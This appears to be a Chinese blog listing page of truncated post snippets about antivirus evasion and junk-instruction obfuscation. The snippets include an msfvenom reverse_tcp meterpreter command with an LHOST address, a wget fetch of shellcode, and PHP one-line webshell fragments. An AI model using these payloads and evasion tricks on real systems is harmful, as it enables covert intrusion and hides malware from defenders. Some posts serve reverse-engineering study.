免杀_花指令

IDA学习经验和实战记录--手过花指令(1)

IDA学习经验和实战记录--手过花指令(1)侦壳脱壳发现问题OD辅助分析IDA实现引入分析花指令情形一情形二情形三情形四脚本去除实验软件下载地址侦壳什么都没有查到应该是自己编写的加密方式(本身这就是一个加壳软件
涛之雨·2020-06-29 12:38

使用Shecodject生成免杀木马

文章目录安装使用安装gitclonehttps://github.com/TaroballzChen/Shecodject.gitcdShecodjectcdsetuppython3setup.py使用运行shecodject进入主界面输入mpr设置payload文件设置好后输入run进行生成生成payload后返回主界面生成exe,同样,设置好后输入run找到tmp目录下的配置文件,使用msfc
0x17·2020-06-29 11:29

msf自免杀

今天大致把远控免杀的文章看了一遍,前面的几篇基本去实现了一遍,后面的直到第26篇全是讲解工具的,大致浏览了一遍,但是没有一一实现啦!
小样!!!·2020-06-29 11:02

DVWA之文件上传(file upload)

渗透思路:通过sql注入注出后台管理员密码目录扫描扫出后台登录地址御剑工具登录getshell点上传文件菜刀/蚁剑连接(菜刀免杀/马免杀)绕WAF提权维持访问种植后门清理痕迹先来学习下dvwa(无wa)
渗透之王·2020-06-29 10:19

冰蝎webshell

4.PHP服务端免杀,过安全狗和D盾。5.文件管理模块
小Hier·2020-06-29 02:51

msf生成win版免杀木马

参考一大佬的在linux下生成一个反弹的msf的python脚本,命令如下:msfvenom-pwindows/meterpreter/reverse_tcpLPORT=443LHOST=192.1681.102-ex86/shikata_ga_nai-i11-fpy-o/mo.py查看下py的内容将buf值全部替换成mo.py的,其他不用修改fromctypesimport*importctyp
莫者·2020-06-29 00:53

免杀艺术 1: 史上最全的免杀方法汇总

本文讲的是免杀艺术1:史上最全的免杀方法汇总,从本文开始,我们将分三章来系统的讲述一下有关免杀的各种技术。
weixin_34303897·2020-06-28 16:11

免杀ASP一句话

"日"thentemp=Mid(cc,i,1)+tempelsetemp=vbcrlf&tempendifnextUnEncode=tempendfunction%>密码iew转载于:https://www.cnblogs.com/hookjoy/p/4122331.html
weixin_34148340·2020-06-28 12:51

花指令的原理和常用花指令收集

花指令的作用是对付静态分析,以下面一段程序说明一下花指令的原理代码#include#includevoidmain(){_asm{jmpl2_EMIT0x1//这里就是花指令_EMIT0x2//这里就是花指令
weixin_33728268·2020-06-28 04:22

灰鸽子病毒——网络神偷之后应用最广的反弹端口***

怎样做灰鸽子免杀?打算抄几个文章介绍下这个***,今天开了”灰鸽子“专栏。
weixin_33699914·2020-06-28 03:10

payload免杀之Installutil.exe&csc.exe利用

0x00前言C#的在Windows平台下的编译器名称是Csc.exe。Installutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等。这两个东西一般情况下是配合使用。所以就不单独拿出来讲了。0x01利用过程1.下载shellcode.cswgethttps://github.com/222222amor/ex
weixin_30883311·2020-06-28 02:57

payload免杀之msbuild利用

0x00前言红队必备技巧免杀之一,现在主要是.net4.0下实现。待我过几天有空实现一下.net2.0。
weixin_30883311·2020-06-28 02:26

16位汇编第九讲汇编指令以及逆向中的花指令

16位汇编第九讲汇编指令以及逆向中的花指令一丶LOOP指令(循环指令)作用:循环指令利用cx计数器自动减1,方便实现计数循环的程序结构例如:movcx,3loop1:;标号.....LOOPloop1;
weixin_30877181·2020-06-28 01:28

《Python绝技:运用Python成为顶级黑客》 用Python实现免杀

1、免杀的过程:使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windowsbindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者远程连接进行操控
weixin_30746117·2020-06-28 00:44

Avet Tool Kali Linux后门免杀

资源:https://github.com/govolution/avet1、在kali上下载:https://sourceforge.net/projects/tdm-gcc/root@kali:/tmp#wget-c--no-check-certificatehttps://nchc.dl.sourceforge.net/project/tdm-gcc/TDM-GCC%20Installer/
一点也不想吃辣·2020-06-27 23:45

36.浅谈DLL劫持

最近在搞内网,需要实现免杀后门,大佬推荐了dll劫持,DLL劫持后,能干很多事情,比如杀软对某些厂商的软件是实行白名单的,你干些敏感操作都是不拦截,不提示的。还有留后门,提权等等。
weixin_30265171·2020-06-27 15:08

一键免杀D盾(免杀一句话无限生成) ——yzddMr6

前言最近逛帖子发现好多人还在找各种免杀一句话。。。都9102年了都不知道有webshell-venom这个东西吗。。。看来我的宣传还是不到位。。。
yzddMr6·2020-06-27 12:09

木马免杀全攻略

木马免杀全攻略[续](图)大家好,很高兴又与大家见面了,不知道大家对上期的文章是否满意,但是木马的免杀很多啊!
usertony·2020-06-27 10:30

网络安全入门资料

课程安全圈白帽子学院信息安全经典书籍教学视频论坛《黑客攻防技术宝典(web实战篇)》《白帽子讲web安全》《web前端黑客技术解密》《WEB之困》《SQL注入攻击与防御》《Metasploit渗透测试指南》《黑客免杀攻防
小心灵呀·2020-06-27 02:32

木马免杀原理详解

免杀常用的工具:Ollydbg调试器简称OD
star1389·2020-06-26 14:01

MSF生成meterpreter及静态免杀

1.静态免杀1.1编译c文件,静态免杀1.1.1生成shellcode在kali命令行输入msfvenom-pwindows/meterpreter/reverse_tcp-ex86/shikata_ga_nai-i12
斯利普·2020-06-26 13:41

渗透测试web安全 - webshell 免杀 绕过waf总结

在做渗透测试的过程中经常会遇到waf的阻拦,针对waf绕过webshell篇总结如下,肯定有遗漏,之后学习之后再继续补充。小型网站常见的waf有:D盾一句话免疫,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异形脚本防御等等。防止黑客入侵和提权,让服务器更安全。云锁云上的安全边界越来越模糊,依靠传统的硬件堆叠的安全防御方式已
white-night·2020-06-26 10:00

介绍 RWSH – Ray’s Web SHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)

中国菜刀下载,基于原版中国菜刀优化版20160309.下载地址:http://download.csdn.net/detail/settoken/9457567http://pan.baidu.com/s/1jHoJxHWChinachopperhttp://pan.baidu.com/s/1eRxEYjCRWSH(pronounced“rush”–credittomyfriendGrevfort
settoken·2020-06-26 08:50

php回调后门,php过WAF一句话,php最新一句话,php过狗一句话.

9457567http://pan.baidu.com/s/1jHoJxHWChinachopperhttp://pan.baidu.com/s/1eRxEYjC分享一下,一些不需要动态函数、不用eval、不含敏感函数、免杀免拦截过
settoken·2020-06-26 08:18

免杀测试】Kali之Metasploit几款工具免杀练习

普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。
Sec朔方·2020-06-26 08:34

shecodject生成免杀木马,一步过360、火绒

gtihub下载和安装https://github.com/TaroballzChen/shecodject直接切到setup/python3setpu.py时间有点长,请耐心等待。使用python3shecodject.py功能介绍mpr生成msf有效shellcodemprrunexe生成shellcode后返回主界面生成exe文件run注意:记得设True,让exe程序运行时不会弹出控制台,
被遗弃的盒子·2020-06-26 03:05

无限免杀D盾脚本之aspx ——yzddMr6

前言自己曾经写过一篇文章:利用随机异或无限免杀某盾php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章.因为aspx的权限一般较大,对于渗透过程中还是很重要的,所以就想着写一篇文章来简单的介绍下
yzddMr6·2020-06-26 01:02

webshell-venom 3.2 :免杀D盾无压力 ——yzddMr6

前言感谢大家对webshell-venom的支持星球自开启以来已经源源不断有各路大佬加入并且一起交流了很多的思路跟想法为了不辜负大家的期望自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更项目在今天也达到了700个星image所以特地推出webshell-venom3.2版本webshell-venom3.2的蚁剑插件版也已经在蚁剑商店上市image原来已经有的点击更新即可3.2是gi
yzddMr6·2020-06-26 01:02

一键免杀D盾(免杀一句话无限生成) ——yzddMr6

前言最近逛帖子发现好多人还在找各种免杀一句话。。。都9102年了都不知道有webshell-venom这个东西吗。。。看来我的宣传还是不到位。。。
yzddMr6·2020-06-26 01:02

远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)

0x00免杀能力一览表几点说明:1、表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
go0dStudy·2020-06-25 21:10

【个人笔记】过D盾PHP免杀一句话

不过D盾还能叫马吗第一种c);}}$zxvg=newZXVG();@$zxvg->c=$_POST['mr6'];第二种<?phpeval(''.get().'');/***@returnstring*/functionget(){$get=$_GET['password'];return$get;}
A4m1n·2020-06-25 19:14

Webshell免杀套路

0x00说明一下,之所转载这篇文章的原因因为前几天详细看了几个小马,想研究一下免杀的技巧,研究了下火绒安全对小马的免杀效果,跟下面描述的效果差不多,不过像D盾,360网站安全卫士等等的这些WAF效果我就不清楚了其实总结下来
菜鸟之小菜·2020-06-25 14:30

深究异或webshell原理以及服务器处理免杀的流程

01.前言之前一直接触rce;但是总是可以看到过滤就可以考虑无数字和字母的webshell或者免杀马,但是今天碰到一道题,让我深刻理解了深究的重要性;不能无脑依靠网上无数字和字母的webshell了;需要知道细节
合天智汇·2020-06-25 13:13

花指令不会去花怎么办?

第一次面对此类型的题,作为新手的我一脸懵。梳理了一下自己的思路,把适合自己这种新手可以接受的解题过程描述下来。打开题目首先拖入IDA看见茫茫多的函数,无从下手。正常。这个时候需要利用一个针对MVC的工具了XSPY将拖到按钮处,记住这里的id0x9e。再次拖到主框处继续查看,看到check按钮的出发事件在偏移0x2420处。OK,这下我们获取了关键信息。返回IDA查看偏移地址0x2420处的函数这里
Wwoc·2020-06-25 13:29

攻防技术——源码免杀实战

源码免杀实战QQ1285575001WechatM010527技术交流QQ群599020441纪年科技aming#1看一下今天的马子Gh0st改良版开始搞事免杀原理病毒样本内存地址/段分析师定位原始特征码
amingMM·2020-06-25 07:35

shellcode——payload分离免杀

anti-virussecuritysoftware三种特点基于特征基于行为基于云查杀-特征查杀都是特别针对PE头文件的查杀当payload文件越大的时候,特征越容易查杀反制查杀机制(概括)采取特征与行为分离免杀避免
amingMM·2020-06-25 07:35

基于 msf 的免杀项目的一些工具

https://mp.weixin.qq.com/s/W7mBroOtVUdMHA7f07J_7Q转载自信安之路这两个月来持续的糜烂,乱七八糟的事,在今天lol完觉得不能再浪费时间来Orz,向大神们开始学习来0x02avet工具使用此工具当年在2017年黑帽大会上惊艳全场,使用kali下载:gitclonehttps://github.com/govolution/avet.git进入avet文件
ProjectDer·2020-06-25 06:28

分享一些无特征PHP一句话-20150719

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。
qq_27446553·2020-06-25 03:26

Webshell免杀绕过waf

Webshell免杀绕过waf0x01前言#尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧0x02目录#关于eval于assert字符串变形定义函数绕过回调函数回调函数变形特殊字符干扰数组类编码绕过无字符特征马
卿's Blog·2020-06-25 00:05

vc++木马源码免杀一些常用方法

vc++木马源码免杀一些常用方法1.字符串连接////////////////////////////////////////////////////////////把字符串"canxin"连接起来(字符串连接法
卿's Blog·2020-06-25 00:05

VirtualAlloc加载shellcode免杀一点记录

一个很好的学习网站推荐一下:https://docs.microsoft.com/zh-cn/windows/win32/api/0x01VirtualAllocVirtualAlloc:在虚拟地址空间中预定一块内存区域;VirtualAlloc是Windows提供的API,通常用来分配大块的内存。PVOIDVirtualAlloc(PVOIDpvAddress,SIZE_TdwSize,DWOR
卿's Blog·2020-06-25 00:04

使用Windows自带命令校验文件哈希值

可用于校验文件MD5、SHA1、SHA256,下载恶意文件和免杀。这里记录如何使用这个程序校验文件,网上很多资源的下载很多都会提供文件的md5
m0c1nu7·2020-06-24 15:19

Metasploit生成免杀恶意程序

2.生成独立运行的二进制文件在演示免杀技术之前,先用MSF攻击载荷生成器(msfvenom)创建一个可独立运行的Metasploit载荷程序。
忘带剑的侠客·2020-06-24 13:52

2018pupstudy后门漏洞

漏洞:程序包自带的PHP的php_xmlrpc.dll模块中有隐藏后门,使用gzuncompress函数进行免杀(IDA可查)影响版本如下phpStudy20180211版本php5.4.45与php5.2.17ext
D1stiny·2020-06-24 12:25

抗去除花指令(一)——花指令基础

转自http://blog.csdn.net/yangbostar/article/details/6194133入门知识,高手勿读一、概述花指令是对抗反汇编的有效手段之一,正常代码添加了花指令之后,可以破坏静态反汇编的过程
Yuri800·2020-06-24 07:33

黑教程集合

个大站教程篇)==================http://115.com/folder/f12108d5969#22套甲壳虫全部教程http://115.com/folder/f128ee9ccca#各站免杀
风云天空·2020-06-24 03:54

kali之——安装免杀工具Veil-Evasion

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84895163VeilEvasion简介VeilEvasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。免责声明:本教程目的只是为了教育,我们不对这些东西会如何使用担任何风险,使用它的后果自负。Veil-Evasion被原生设计为在kali
冰 河·2020-06-24 02:06

黑客制作windows客户端恶意软件进行渗透(kali:metasploit 内网)萌新

我们要利用免杀来躲避安全软件的查杀。
kingru·2020-06-24 01:50

一键免杀D盾(webshell-venom 3.0 发布) ——yzddMr6

宝塔在遇到header404时会解析到他的404模版上而不是shell上导致无法连接,故去除头部的404,如有需要自行添加2.变量全员随机化,不再有固定的变量名称3.增加流量传输编码方式并且兼容原版4.免杀依旧
yzddMr6·2020-06-23 23:04

使用shellcode打造MSF免杀payload及shellcode加载技术

0x00前言经常有同学提及MSFpayload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。
jackey3Lin·2020-06-23 20:27
上一页 11 12 13 14 15 16 17 18 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他